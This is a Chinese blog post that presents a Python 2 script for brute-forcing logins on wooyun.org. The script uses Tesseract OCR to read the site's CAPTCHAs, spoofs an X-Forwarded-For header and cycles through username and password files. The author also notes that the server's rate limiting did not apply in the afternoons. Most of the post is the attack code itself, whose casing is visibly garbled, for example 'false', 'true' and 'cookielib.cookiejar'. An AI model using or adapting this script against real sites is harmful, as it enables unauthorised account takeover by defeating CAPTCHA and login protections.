- A+
所属分类:Python
需要预安装如下程序
1、pytesseract (可以pip install pytesseract安装)
2、python imaging library (pil)
3、tesseract-ocr
原理:
1、利用tesseract 进行验证码的识别。
2、post暴力猜解
问题1.验证码的识别率
进行了一次处理,从正则里可以看到pattern = '^[a-za-z0-9]{4}$' 只取识别为4位的字符,如果不是则重新请求验证码,这个在很大程度上提高了识别率。
问题2.服务端频率验证
经过我两天的实验观察,早上会有次数限制,连续两天的下午我尝试了大于1161次的登陆都没有限制,不知道是什么原因,也许是我网络问题
#coding: utf-8 #date: 2014/09/23 #author: titans import cookielib import urllib2 import urllib import socket import sys import time import re import image import pytesseract def guess_login(url, users, passwords): cj = cookielib.cookiejar() opener = urllib2.build_opener(urllib2.httpcookieprocessor(cj)) opener.addheaders = [ ('user-agent','mozilla/5.0 (windows nt 5.1; rv:24.0) gecko/20100101 firefox/24.0'), ('accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('accept-encoding','gzip, deflate'), ('connection', 'keep-alive'), ('x-forwarded-for','127.0.0.1'), ] urllib2.install_opener(opener) captcha = '' catp_url = 'http://www.wooyun.org/captcha.php' pattern = '^[a-za-z0-9]{4}$' regex = re.compile(pattern) for user in users: user = user.strip() find = false for password in passwords: while_mark = 1 password = password.strip() while(while_mark): opener.open(url) pic = opener.open(catp_url) content = pic.read() f = open('c:\\temp\capta.jpg','wb') f.write(content) f.close() time.sleep(1) captcha = pytesseract.image_to_string(image.open('c:\\temp\capta.jpg')) re_result = regex.match(captcha) if re_result: print user, password, captcha post_data = 'email=%s&password=%s&captcha=%s'%(user,password,captcha) post_url = 'http://www.wooyun.org/user.php?action=login&do=login' resp = opener.open(post_url,post_data) while_mark = 0 cookies = resp.info().getheaders('set-cookie') if len(cookies): find = true raw_input('get it!!%s %s'%(user,password)) else: print '[*]repeat request' pass if find == true: break def run(): if len(sys.argv) !=3: usage() url = 'http://www.wooyun.org/user.php?action=login' users = open(sys.argv[1],'r').readlines() passwords = open(sys.argv[2],'r').readlines() guess_login(url, users, passwords) def usage(): print 'wooyun.py users.txt passwords.txt' exit(0) if __name__ == '__main__': run()
windows下使用,如果linux下测试,修改存放验证码的路径c:\\temp\capta.jpg 改为linux下的路径即可
usage: wooyun.py users.txt passwords.txt
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫